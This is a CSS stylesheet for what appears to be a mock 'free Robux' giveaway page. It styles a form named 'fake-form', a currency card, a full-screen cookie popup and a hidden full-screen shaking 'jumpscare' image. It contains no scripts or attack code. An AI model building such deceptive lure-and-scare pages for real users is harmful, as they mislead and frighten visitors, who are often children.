* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
}

body {
  min-height: 100vh;
  background: radial-gradient(circle at top, #1fdf64 0, #0f172a 45%, #020617 100%);
  color: #e5e7eb;
  overflow: hidden;
  display: flex;
  flex-direction: column;
}

header {
  text-align: center;
  padding: 20px 16px;
  flex-shrink: 0;
}

header h1 {
  font-size: 2.2rem;
  letter-spacing: 0.05em;
  text-transform: uppercase;
  color: #bbf7d0;
  text-shadow: 0 0 12px rgba(34, 197, 94, 0.7);
}

.subtitle {
  margin-top: 6px;
  color: #9ca3af;
  font-size: 0.95rem;
}

main {
  flex: 1;
  max-width: 960px;
  margin: 0 auto;
  padding: 20px 16px;
  display: flex;
  align-items: center;
  justify-content: center;
}

.hero {
  width: 100%;
  max-width: 900px;
  display: flex;
  gap: 24px;
  align-items: stretch;
}

.hero-text {
  flex: 1.3;
  background: rgba(15, 23, 42, 0.85);
  border-radius: 14px;
  padding: 30px 28px;
  box-shadow: 0 18px 40px rgba(0, 0, 0, 0.65);
  border: 1px solid rgba(148, 163, 184, 0.3);
  backdrop-filter: blur(8px);
  display: flex;
  flex-direction: column;
  justify-content: center;
}

.hero-text h2 {
  font-size: 1.5rem;
  margin-bottom: 12px;
  color: #e5e7eb;
}

.hero-text p {
  font-size: 0.95rem;
  color: #9ca3af;
  margin-bottom: 24px;
  line-height: 1.5;
}

.fake-form label {
  display: block;
  font-size: 0.85rem;
  color: #d1d5db;
  margin-bottom: 6px;
  margin-top: 12px;
}

.fake-form input,
.fake-form select {
  width: 100%;
  padding: 12px 14px;
  border-radius: 8px;
  border: 1px solid #334155;
  background: #020617;
  color: #e5e7eb;
  font-size: 0.9rem;
  outline: none;
  transition: border-color 0.2s;
}

.fake-form input:focus,
.fake-form select:focus {
  border-color: #22c55e;
  box-shadow: 0 0 0 2px rgba(34, 197, 94, 0.2);
}

.fake-form button {
  margin-top: 20px;
  width: 100%;
  padding: 12px 0;
  border-radius: 999px;
  border: none;
  background: linear-gradient(90deg, #22c55e, #16a34a);
  color: #022c22;
  font-weight: 600;
  font-size: 0.95rem;
  cursor: pointer;
  transition: all 0.2s;
}

.hero-side {
  flex: 0.9;
  display: flex;
  flex-direction: column;
  justify-content: center;
  gap: 16px;
}

.robux-card {
  background: radial-gradient(circle at top left, #22c55e 0, #15803d 45%, #052e16 100%);
  border-radius: 18px;
  padding: 24px 20px;
  display: flex;
  align-items: center;
  gap: 16px;
  box-shadow: 0 20px 40px rgba(22, 163, 74, 0.6);
  border: 1px solid rgba(187, 247, 208, 0.3);
}

.robux-icon {
  width: 60px;
  height: 60px;
  border-radius: 999px;
  border: 2px solid #bbf7d0;
  display: flex;
  align-items: center;
  justify-content: center;
  font-weight: 800;
  color: #022c22;
  font-size: 1.3rem;
  background: rgba(255, 255, 255, 0.2);
}

.robux-info {
  display: flex;
  flex-direction: column;
  gap: 4px;
}

.robux-info .value {
  font-size: 1.6rem;
  font-weight: 800;
  color: #f9fafb;
}

.robux-info .label {
  font-size: 0.85rem;
  color: #d1fae5;
  font-weight: 500;
}

.status-text {
  font-size: 0.9rem;
  color: #9ca3af;
  text-align: center;
}

.status-on {
  color: #4ade80;
  font-weight: 600;
}

footer {
  position: fixed;
  bottom: 0;
  left: 0;
  width: 100%;
  background: rgba(15, 23, 42, 0.95);
  color: #6b7280;
  text-align: center;
  font-size: 0.8rem;
  padding: 12px 0;
  border-top: 1px solid rgba(31, 41, 55, 0.9);
  backdrop-filter: blur(10px);
}

/* Cookie popup */
#cookie-popup {
  position: fixed;
  inset: 0;
  background-color: rgba(15, 23, 42, 0.9);
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 20px;
  z-index: 1000;
}

.popup-content {
  width: 100%;
  max-width: 480px;
  background: linear-gradient(145deg, #020617, #0f172a);
  border-radius: 16px;
  padding: 24px 28px;
  box-shadow: 0 25px 50px rgba(0, 0, 0, 0.9);
  border: 1px solid rgba(34, 197, 94, 0.3);
  animation: slideUp 0.4s ease-out;
}

.popup-content h2 {
  font-size: 1.2rem;
  margin-bottom: 8px;
  color: #e5e7eb;
  text-align: center;
}

.popup-content p {
  font-size: 0.88rem;
  color: #9ca3af;
  line-height: 1.45;
  text-align: center;
  margin-bottom: 20px;
}

.popup-buttons {
  display: flex;
  justify-content: center;
  gap: 12px;
}

.primary-btn, .secondary-btn {
  flex: 1;
  padding: 10px 20px;
  border-radius: 12px;
  font-size: 0.9rem;
  font-weight: 600;
  cursor: pointer;
  border: none;
  transition: all 0.2s;
}

.secondary-btn {
  background: rgba(75, 85, 99, 0.3);
  color: #e5e7eb;
  border: 1px solid rgba(75, 85, 99, 0.5);
}

.secondary-btn:hover {
  background: rgba(75, 85, 99, 0.5);
}

.primary-btn {
  background: linear-gradient(90deg, #22c55e, #16a34a);
  color: #022c22;
  box-shadow: 0 4px 15px rgba(34, 197, 94, 0.4);
}

.primary-btn:hover {
  transform: translateY(-1px);
  box-shadow: 0 6px 20px rgba(34, 197, 94, 0.5);
}

/* Jumpscare */
#jumpscare {
  position: fixed;
  inset: 0;
  background: black;
  display: none;
  justify-content: center;
  align-items: center;
  z-index: 9999;
}

#scare-img {
  width: 0;
  opacity: 0;
  transition: all 0.05s ease-in;
  max-width: 100%;
  max-height: 100%;
}

#jumpscare.active {
  display: flex !important;
}

#jumpscare.active #scare-img {
  width: 100vw;
  height: 100vh;
  object-fit: cover;
  opacity: 1;
  animation: shake 0.12s infinite;
}

@keyframes slideUp {
  from { opacity: 0; transform: translateY(30px) scale(0.95); }
  to { opacity: 1; transform: translateY(0) scale(1); }
}

@keyframes shake {
  0%, 100% { transform: translate(3px, 3px) rotate(0deg); }
  25% { transform: translate(-3px, -4px) rotate(-2deg); }
  50% { transform: translate(-2px, 3px) rotate(2deg); }
  75% { transform: translate(2px, -3px) rotate(-1deg); }
}

/* Responsive */
@media (max-width: 768px) {
  .hero {
    flex-direction: column;
    gap: 20px;
  }
  
  main {
    padding: 10px 16px;
  }
  
  footer {
    position: static;
    margin-top: 20px;
  }
}
